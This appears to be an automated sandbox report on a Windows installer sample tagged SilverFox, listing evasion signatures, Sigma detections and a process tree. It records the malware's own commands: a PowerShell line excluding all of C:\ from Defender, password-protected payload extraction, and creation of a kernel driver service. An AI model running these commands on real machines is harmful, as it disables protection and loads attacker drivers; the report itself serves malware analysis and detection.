Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.1.exe

Overview

General Information

Sample name:	#U5b89#U88c5#U52a9#U624b1.0.1.exe renamed because original name is a hash value
Original sample name:	1.0.1.exe
Analysis ID:	1580229
MD5:	f2845d6410a0d9a090d414f3ae742e3b
SHA1:	a27e62687254f001c08b5313465d2ed1870f0eb5
SHA256:	f56c3d038c408355f6fb191865ca5650b29926f65b78d02b008b509bf640e588
Tags:	exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Adds a directory exclusion to Windows Defender

Contains functionality to hide a thread from the debugger

Found driver which could be used to inject code into processes

Hides threads from debuggers

Loading BitLocker PowerShell Module

Protects its processes via BreakOnTermination flag

Query firmware table information (likely to detect VMs)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: New Kernel Driver Via SC.EXE

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

#U5b89#U88c5#U52a9#U624b1.0.1.exe (PID: 1360 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" MD5: F2845D6410A0D9A090D414F3AE742E3B)

#U5b89#U88c5#U52a9#U624b1.0.1.tmp (PID: 2076 cmdline: "C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20444,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" MD5: F0D4EEA505CEB561AB4AD622E3C0B9D5)

powershell.exe (PID: 2352 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6572 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

#U5b89#U88c5#U52a9#U624b1.0.1.exe (PID: 5808 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT MD5: F2845D6410A0D9A090D414F3AE742E3B)

#U5b89#U88c5#U52a9#U624b1.0.1.tmp (PID: 1812 cmdline: "C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$5046E,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT MD5: F0D4EEA505CEB561AB4AD622E3C0B9D5)

7zr.exe (PID: 6204 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)

conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

7zr.exe (PID: 2300 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)

conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5692 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6768 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3560 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1492 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4508 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1644 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5704 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5600 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5144 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6768 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4744 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6208 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3992 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2472 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3116 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6204 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6208 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5296 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1684 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4612 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1276 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1564 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6204 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5560 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1372 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2284 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5248 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1864 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3752 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2608 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6208 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6460 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5296 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4284 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7116 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3480 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2408 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5228 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6180 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2352 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cleanup

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20444,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, ParentProcessId: 2076, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2352, ProcessName: powershell.exe

Sigma detected: New Kernel Driver Via SC.EXE

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6768, ProcessName: sc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6768, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20444,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, ParentProcessId: 2076, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2352, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe

Virustotal: Detection: 6%

Perma Link

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2170528884.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2170634734.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CC9AEC0 FindFirstFileA,FindClose,FindClose,		7_2_6CC9AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00186868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,		11_2_00186868

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 11_2_00187496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

11_2_00187496

Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
